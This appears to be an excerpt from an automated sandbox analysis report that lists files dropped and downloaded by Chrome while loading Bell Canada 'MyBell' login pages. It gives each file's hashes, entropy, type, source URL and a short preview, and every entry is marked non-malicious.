                                                                                                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.972332956306684
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8Td1TkjHyidAKZdA1X4ehBiZUk1W1qeh4y+C:8nwUb9Yy
                                                                                                                                                                                                                                                                                                                                      MD5:1E4F42B4D20500C16C2D191096DB2FA3
                                                                                                                                                                                                                                                                                                                                      SHA1:57C060F98F333C9ADC75F80DCFD6A7E51A73A74B
                                                                                                                                                                                                                                                                                                                                      SHA-256:03713DBE03A06C7382622387EA539B29EA7E73E2F34D09D8DC339CBC09BF1A9B
                                                                                                                                                                                                                                                                                                                                      SHA-512:FC191981F808BAFC1535216A57FEE6D9344F8C85C05FE63F25545EBAFF84B8A649CB92865A7DA711FA6798718F378B1D402CD860CC9CBB979647EAE7E9CC9E29
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....%.s.+....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I_Yyi....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Yyi....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V_Yyi....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V_Yyi.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V_Yzi...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 12:11:51 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.978742418101979
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:80d1TkjHyidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbmy+yT+:82whTcJTbxWOvTbmy7T
                                                                                                                                                                                                                                                                                                                                      MD5:19EC09CE11A50052D31F2DDFD5D68A1C
                                                                                                                                                                                                                                                                                                                                      SHA1:C500584328FB070BEE2980B4BD4ADD97F6C29A75
                                                                                                                                                                                                                                                                                                                                      SHA-256:143DAB6F5DF0BE908EC500D6158C0D14CA79F716E1EF566AC640F49525FD09B4
                                                                                                                                                                                                                                                                                                                                      SHA-512:6B99BBC800B334A9762B8F6947714AFC5A2EDAE3843F490BE56F99463482B0B2B5AB42DBEBB517784824CA280085388910ED7B3050F648FAAA98B1ECA5AD0EDE
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....w\ys.+....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I_Yyi....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Yyi....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V_Yyi....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V_Yyi.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V_Yzi...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4766), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):4766
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.822940093154602
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRUs9mIQt4B:1DY0hf1bT47OIqWb199RQtY
                                                                                                                                                                                                                                                                                                                                      MD5:998A9883DCBD3E2EA174A3F1B4A18937
                                                                                                                                                                                                                                                                                                                                      SHA1:DA6C9D6982533D869A4CF293734A48B6BA2A998F
                                                                                                                                                                                                                                                                                                                                      SHA-256:AD8F5FD4146CA0DB538F6C6BCC7FD8FAECCEDC2EEE6B8A5AB72CF0DD6C737EA8
                                                                                                                                                                                                                                                                                                                                      SHA-512:D4B49EE4637952F62DD7F1D5A2C7937A76E1EB8C510847082D893358944E6528C9912727090DB5C4CA6FF73E2C4920444EB2BE4C067D66D0F0F9534F347BE5BF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):14602
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.6344281406456185
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:cIReZtCQ5tZDXHj7je4xb7s79bVzynWiv43JA9hfETCfn1KacVuqE6Z3IPK:mRHa457s7VAWz3JyE2fn1KacVuqE6Z3B
                                                                                                                                                                                                                                                                                                                                      MD5:BB18E06557B886DADD854B9250901D51
                                                                                                                                                                                                                                                                                                                                      SHA1:D3AD02BBABEFD29E332850558C479059D393EBDC
                                                                                                                                                                                                                                                                                                                                      SHA-256:91C3F1E71D54ADF39F70FD48951549971D4D8C2A0F66A74463616116E5910EC9
                                                                                                                                                                                                                                                                                                                                      SHA-512:4345A714BDB95CDAA29EF722AF8055C33E57004A643A2BDD957E0DDB6F2067FE67A7C3296735E5FA525D8B258D1FCFDE142D89D623190AEA425703705B3503DC
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/styles/RSX/mybell.js?v=47-8px8fooFPBN5xNNFlFlHAmdbrMwP9p8MK_Uw4qzw1&ver=00000000
                                                                                                                                                                                                                                                                                                                                      Preview:/* Minification failed. Returning unminified contents...(33,22-23): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: i..(33,45-46): run-time error JS1294: Strict-mode does not allow ++ or -- on certain objects: i..(46,21-22): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: n..(38,25-26): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: a..(37,25-26): run-time error JS1294: Strict-mode does not allow ++ or -- on certain objects: i..(43,29-30): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: i..(42,29-30): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: a..(41,29-30): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: b..(34,21-22): run-time error JS1300: Strict-mode does not allow assignment to undefined variables: a..(31,17-18): run-time error JS1300: Strict-mode does not
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 81x77, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):9744
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.804592820922817
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:1AhgxOQjz9qXAfIop80qsWr2UWGAHddaL3sIKS5sdB1w+Zvrvp:1AhgcQfiDJh2ZG0ddaDsID23trx
                                                                                                                                                                                                                                                                                                                                      MD5:1C75BEB5DF106A3B0AD48F2CA2A93535
                                                                                                                                                                                                                                                                                                                                      SHA1:7A3D5A78A58927B0EF80C02CAEE46D50C008E463
                                                                                                                                                                                                                                                                                                                                      SHA-256:7B1416DB2386C035920FBAAC1EDA0AEA0067A271808920B91082F8DC8D435871
                                                                                                                                                                                                                                                                                                                                      SHA-512:5B4443E7B9F162403F7107450DF7DA60A1E886693A41BF40C9CCD3D7A2757A305CFE30F19DB1A80EC3F91D307DB4B592C79EE03EFC9B76CE43B48A4CD2C4C0AB
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/RSX/shop/img/69643-bell-icon-person.jpg?ver=202102011754
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.....H.H.....C....................................................................C.......................................................................M.Q...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...~".B.o.o....G.=~.....v.s...[.i..v6.>X.d.......4..n5.WQ...t.k..ky=~..3.).....05.,.8......=j...s..(Q..z.Ui...N.'.R..S.<..;..w)..y.6._..~...V.$!.h.....V.Vp...O..'.V...'Z.!/.c......|x..._i.....3.H.h./.4..]...[.8....(.m.@k....N.gqs....x.RC.?......8J8.9...:.y.4.bqx.....0tp..c.......N...?..7...q...s.Uj....Q.rQ.<6...ba..?15.C......|.......O.|Iu..~.[.O.h..ff..h..N..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 143x48, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6114
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.851450612125079
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:R22zVtzGfULemt1uA/c7HV2hNAYiUeDFTu+KtdK+ZgY5rReLQ+Ge4DiyM:vmUD1ui8VUAYiUl+WdK+xaB4i
                                                                                                                                                                                                                                                                                                                                      MD5:5EF178FDA2A34FB73BA43BBAE977C113
                                                                                                                                                                                                                                                                                                                                      SHA1:06E2F1B27DAC00772E98307EE62752D954D7E4F9
                                                                                                                                                                                                                                                                                                                                      SHA-256:4B28052E176DA56CFBA975C907267F7B3E7AC68705DA9B1AEC8FF7223CB2A2FC
                                                                                                                                                                                                                                                                                                                                      SHA-512:D66C33A0B2EB1490E0D4011B4CDAACE9E4566A76F23EEBCE6531A040E4462394315C594D29182F2CB5B1B0639676E0F79527537B148AB5508C3E8FB67A4B78D4
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/RSX/shop/img/app-store-icon__google_en.jpg?ver=202303211822
                                                                                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......d...../http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2014 (Windows)" xmpMM:InstanceID="xmp.iid:22FD072944E111E4A859DDF205F00E4D" xmpMM:DocumentID="xmp.did:22FD072A44E111E4A859DDF205F00E4D"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:22FD072744E111E4A859DDF205F00E4D" stRef:documentID="xmp.did:22FD072844E111E4A859DDF205F00E4D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................................................................................................................
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 564 x 168, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):16081
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.942632407356857
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:8n/nJAk8kBcQ+PN/pKEHpLw7Fwfo03gs0VXoOGbzB:8Pki+PN/pKgNw74V3r0dKbzB
                                                                                                                                                                                                                                                                                                                                      MD5:8EB9CF21FE8441FD54725BFE7AB2BBBB
                                                                                                                                                                                                                                                                                                                                      SHA1:EA286946D0004FE420FE6DEB26FB1B82A2C37E97
                                                                                                                                                                                                                                                                                                                                      SHA-256:5CB317B709E96F1D136B343FFE81C430573EF56C94B6BA14684969C1C756AD9F
                                                                                                                                                                                                                                                                                                                                      SHA-512:03CD35DA4D35DB4D774CA94857311FEF8257D5EB89A43D34DF1D3CA4303774A9A3E91A4F97E26476C7AF948B22C7E9627E9E2BF57C97932AE3C9787BDB6A9075
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...4...........t.....pHYs...#...#.x.?v....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.0 (Macintosh)" xmp:CreateDate="2021-03-12T10:29:54-05:00" xmp:ModifyDate="2021-03-12T14:15:51-05:00" xmp:MetadataDate="2021-03-12T14:15:51-05:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:495b953a-556c-4a39-bb77-461e7175276a" xmpMM:DocumentID="xmp.did:495b953a-556c-4a39-bb77-461e7175276a" xmpMM:Origin
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (7528), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):7528
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.1506123827806505
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:RkEC87K3dBQzFzuzoPdmtzczDpozxz/Z2+V:RkEC87K3dBQZCUPdmtov+5A+
                                                                                                                                                                                                                                                                                                                                      MD5:7FE8D64057A7EDE82AD984F682E218C1
                                                                                                                                                                                                                                                                                                                                      SHA1:C3754AD9643F961709A64F94D0A5FD5F568B55D5
                                                                                                                                                                                                                                                                                                                                      SHA-256:870A648635FF68E780740469A8AD92D1899870E12362ADFFA3CD97599D3A5F1E
                                                                                                                                                                                                                                                                                                                                      SHA-512:0BDF63A416A83F1DD4A1C3EA7B0189F6EE4F3B5FCE2B9996D1DE299D571974F8B53C60AC5986A80CEE9B9C7AAF3E2E6801393D0054AFADFBA2ECE3822888C8ED
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/styles/RSX/mybell/css/bell.css?v=7Ds5ChdcgFBOOflebYvOBBa1eedJgSs5ORbb4q-0P4g1&ver=00000000
                                                                                                                                                                                                                                                                                                                                      Preview:.my-bell-login .my-bell-login-left-pane,.my-bell-login .my-bell-login-right-pane{background:#fff;border:solid 1px #d4d4d4}.my-bell-login .my-bell-login-form .rsx-form-label{padding-top:20px}.my-bell-login .my-bell-login-form .validation-messages{background-color:#f0f0f0;border:2px solid #e1e1e1;padding:20px}.my-bell-login .my-bell-login-form .rsx-notification span.rsx-icon:before{color:#fff;font-size:10px;left:1px;top:2px;-webkit-transform:none;-ms-transform:none;transform:none}.my-bell-login .my-bell-login-form .rsx-notification{padding-left:26px}.my-bell-login .my-bell-login-form .rsx-notification span.rsx-icon{top:1px;width:16px;height:16px}.my-bell-login .my-bell-login-form .rsx-error .rsx-error-text{color:#bc0000}.my-bell-login .my-bell-login-form .rsx-notification.rsx-error span.rsx-icon{background:#bc0000}.my-bell-login .my-bell-login-form .rsx-notification.rsx-warning span.rsx-icon{background:#dfa32a}.my-bell-login .my-bell-login-form .rsx-notification .rsx-list{margin-top:5px}
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1446
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.036248523737921
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:CmrAAw96jimX8SCZUYRaRM+Jzo8MdtJAC8760O1mrRsUjxPyt:CJGjimX8SmUaaeZwC90OYsMPyt
                                                                                                                                                                                                                                                                                                                                      MD5:5B35E8B38DA17E517934E249416F4213
                                                                                                                                                                                                                                                                                                                                      SHA1:27DC111721746E492CE1037307812622CBDCE8D2
                                                                                                                                                                                                                                                                                                                                      SHA-256:AF03614D99771E0F3786FDA656E7020A7BB83EA098F7A29F78F8F3F0B10BD049
                                                                                                                                                                                                                                                                                                                                      SHA-512:8D7537EC5BEFC09956B4D6266860867B6CB39A9E8D951DB083D87A807E2A547184DB71F2DB08DE79285DB7E98F144F229F6F04607439CCC9075A9AE7649E4DB5
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Resource/web/js/opinion_lab/oo_conf_inline.js?ver=201809301812
                                                                                                                                                                                                                                                                                                                                      Preview:/*..OnlineOpinion v5.9.0..Released: 11/17/2014. Compiled 11/17/2014 01:01:01 PM -0600..Branch: master 7cffc7b9a0b11594d56b71ca0cb042d9b0fc24f5..Components: Full..UMD: disabled..The following code is Copyright 1998-2014 Opinionlab, Inc. All rights reserved. Unauthorized use is prohibited. This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. http://www.opinionlab.com..*/..../* global window, OOo */../*..Inline configuration..*********************..Object is now being instantiated against the OOo object (1 global class)..To call this object, place the below in the click event..OOo.oo_feedback.show(event)..*/..(function (w, o) {.. 'use strict';.. var oo_rp = '://en-ca.mybell.bell.ca';.. var lang = OOo.readCookie('gemini');.. if ((/language=fr/i).test(lang)) {.. oo_rp = '://fr-ca.mybell.bell.ca';.. }.... var OpinionLabInit = function () {.... o.oo_feedback = new o.Ocode({..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1214
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.200858045951462
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:6WyDrwzhkK5N2FYsA52I9SK0O8f52I9J7KIh52I9J7chVKjr:6WyXKr2g52IIK07f52Ir7Ka52Ir7GVKX
                                                                                                                                                                                                                                                                                                                                      MD5:2C86200305A4178F7BEF897567300977
                                                                                                                                                                                                                                                                                                                                      SHA1:000BA560C6333FB559554847C86AE52CDEBD12B9
                                                                                                                                                                                                                                                                                                                                      SHA-256:7D32A8D79883C3AAC8A2EDEED18D22AF5823FECDB92970F4144710CF54283689
                                                                                                                                                                                                                                                                                                                                      SHA-512:0973C4C21CB7FF002696FEDEDB1D3BBFA90DDA9685F00B1CA84676D9AC8D76094A77A8F5F91DB639F934B52C80A9CC6622070AE2B8703AB00F1A8925753DA95E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Resource/web/DCX/css/bell_custom_deprecatedbrowser_new.css?ver=202410310228
                                                                                                                                                                                                                                                                                                                                      Preview:./* Use This file to change or overwrite core CSS files */../*!:: BELL CANADA v1.2830 */..../* CSS from version 1.2106 bell_prime.css - Merged on May 12th, 2010 at 10:51PM EST */../*:: =CR6: ACN pages ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: */...ieDeprecateBrowserMessageCloseButton {.. display:block; .. width:20px; .. height:20px; .. background-image:url(https://mybell-qc.akamaized.net/resource/web/DCX/css/sprites/icons_ie_deprecatedmessage.png?ver=201809301812);.. background-position: 0 -40px;..}.....ieDeprecateBrowserMessageIconInformation {.. display:block;.. width:38px; .. height:38px; .. background-image:url(https://mybell-qc.akamaized.net/resource/web/DCX/css/sprites/icons_ie_deprecatedmessage.png?ver=201809301812); .. background-position: 0 0;..}.....ieDeprecateBrowserMessageRightArrow {.. background-image:url(https://mybell-qc.akamaized.net/resource/web/DCX/css/sprites/icons_ie_deprecatedmessage.png?ver=201809301812);
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
